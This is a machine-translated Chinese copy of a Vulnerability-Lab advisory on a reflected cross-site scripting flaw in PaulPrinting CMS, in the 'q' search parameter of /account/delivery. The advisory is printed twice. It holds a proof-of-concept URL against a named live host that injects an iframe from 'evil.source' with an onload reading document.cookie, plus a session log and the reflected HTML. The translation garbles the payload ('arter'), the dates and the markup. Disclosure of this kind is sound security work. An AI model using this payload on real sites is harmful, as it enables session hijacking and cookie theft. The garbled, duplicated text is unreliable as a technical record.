利用标题: Paulprinting CMS-(搜索交付)交叉站点脚本
参考(来源):
============================
发布日期:
=================
2023-07-17
脆弱性实验室ID(VL-ID):
==============================================
2286
常见的漏洞评分系统:
==============================================
5.2
漏洞class:
============================
跨站点脚本- 非持久性
产品服务简介:
========================================
PaulPrinting设计丰富,易于使用,搜索引擎友好,现代设计以及具有视觉吸引人的界面。
(HomePage:https://codecanyon.net/user/codepaul的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队发现了Paulprinting(V2018)CMS Web应用程序中的非持久跨站点脆弱性。
漏洞披露时间表:
============================================
2022-08-253360研究人员通知协调(安全研究人员)
2022-08-263360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-173360公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
打开身份验证(匿名特权)
用户交互:
=====================
中等用户互动
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方的PaulPrinting(V2018)CMS Web应用程序中发现了客户端跨站点脚本漏洞。
远程攻击者能够通过注入恶意脚本代码来操纵客户端请求,以损害用户会话数据。
客户端跨站点脚本网络漏洞位于搜索输入字段中,没有安全验证的Q参数
影响交货模块。远程攻击者能够将自己的恶意脚本代码注入搜索输入以引发客户端
脚本代码执行无安全编码。执行的请求方法是获取的,并且攻击向量是非持久的。
成功剥削漏洞会导致会话劫持,非持久网络钓鱼攻击,非持久的外部重定向
对受影响的应用模块的恶意来源和非持续性操纵。
请求方法:
[+]获取
弱势模块:
[+] /帐户/交付
脆弱的输入:
[+]搜索
脆弱参数:
[+] q
受影响的模块:
[+] /帐户/交付
[+]交货联系人
概念证明(POC):
================================
非特权用户帐户和中等用户互动的远程攻击者可以利用非敏感的XSS Web漏洞。
为了进行安全示范或复制漏洞,请遵循以下提供的信息和步骤继续进行。
POC:示例
POC:剥削
https://codeawesome.in/printing/account/delivery?q=a'iframe src=evil.source onload=arter=arter(document.cookie)
--- POC会话日志(GET)---
https://codeawesome.in/printing/account/delivery?q=a'iframe src=evil.source onload=arter=arter(document.cookie)
host: codeawesome.in
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Connection:保持空白
cookie:成员_login=1;成员_id=123; Session_ID=25246428FE6E707A3BE0E0E0E0E0E54F0E5BF;
-
GET: HTTP/3.0 200好
content-type:文本/html; charset=UTF-8
X-Power-By: PHP/7.1.33
脆弱的源:(搜索- 交货?q=)
Div类='Col-LG-8'
a href='https://codeawesome.in/printing/account/clase'class='btn btn btn-primary mt-4 mb-2 float-right'
我class='fa fa fa-fw fa-plus'/i
/一个
表格class='form-inline mt-4 mb-2'方法='get'
DIV类='输入组MB-3 MR-2'
输入类型='text'class='form-control'名称='q'value='a'iframe src='evil.source'onload='alert(document.cookie)''''
div类='输入组申请'
按钮class='btn btn-outline-secdary'type='submit'id='button-addon2'i class='fa fa fa fa fa fa-search'/i/i/button
/div/div
安全风险:
===================
跨站点脚本编写Web漏洞的安全风险估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab
参考(来源):
============================
正在加载...
www.vulnerability-lab.com
=================
2023-07-17
脆弱性实验室ID(VL-ID):
==============================================
2286
常见的漏洞评分系统:
==============================================
5.2
漏洞class:
============================
跨站点脚本- 非持久性
产品服务简介:
========================================
PaulPrinting设计丰富,易于使用,搜索引擎友好,现代设计以及具有视觉吸引人的界面。
(HomePage:https://codecanyon.net/user/codepaul的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队发现了Paulprinting(V2018)CMS Web应用程序中的非持久跨站点脆弱性。
漏洞披露时间表:
============================================
2022-08-253360研究人员通知协调(安全研究人员)
2022-08-263360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-173360公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
打开身份验证(匿名特权)
用户交互:
=====================
中等用户互动
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方的PaulPrinting(V2018)CMS Web应用程序中发现了客户端跨站点脚本漏洞。
远程攻击者能够通过注入恶意脚本代码来操纵客户端请求,以损害用户会话数据。
客户端跨站点脚本网络漏洞位于搜索输入字段中,没有安全验证的Q参数
影响交货模块。远程攻击者能够将自己的恶意脚本代码注入搜索输入以引发客户端
脚本代码执行无安全编码。执行的请求方法是获取的,并且攻击向量是非持久的。
成功剥削漏洞会导致会话劫持,非持久网络钓鱼攻击,非持久的外部重定向
对受影响的应用模块的恶意来源和非持续性操纵。
请求方法:
[+]获取
弱势模块:
[+] /帐户/交付
脆弱的输入:
[+]搜索
脆弱参数:
[+] q
受影响的模块:
[+] /帐户/交付
[+]交货联系人
概念证明(POC):
================================
非特权用户帐户和中等用户互动的远程攻击者可以利用非敏感的XSS Web漏洞。
为了进行安全示范或复制漏洞,请遵循以下提供的信息和步骤继续进行。
POC:示例
正在加载...
codeawesome.in
https://codeawesome.in/printing/account/delivery?q=a'iframe src=evil.source onload=arter=arter(document.cookie)
--- POC会话日志(GET)---
https://codeawesome.in/printing/account/delivery?q=a'iframe src=evil.source onload=arter=arter(document.cookie)
host: codeawesome.in
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Connection:保持空白
cookie:成员_login=1;成员_id=123; Session_ID=25246428FE6E707A3BE0E0E0E0E0E54F0E5BF;
-
GET: HTTP/3.0 200好
content-type:文本/html; charset=UTF-8
X-Power-By: PHP/7.1.33
脆弱的源:(搜索- 交货?q=)
Div类='Col-LG-8'
a href='https://codeawesome.in/printing/account/clase'class='btn btn btn-primary mt-4 mb-2 float-right'
我class='fa fa fa-fw fa-plus'/i
/一个
表格class='form-inline mt-4 mb-2'方法='get'
DIV类='输入组MB-3 MR-2'
输入类型='text'class='form-control'名称='q'value='a'iframe src='evil.source'onload='alert(document.cookie)''''
div类='输入组申请'
按钮class='btn btn-outline-secdary'type='submit'id='button-addon2'i class='fa fa fa fa fa fa-search'/i/i/button
/div/div
安全风险:
===================
跨站点脚本编写Web漏洞的安全风险估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab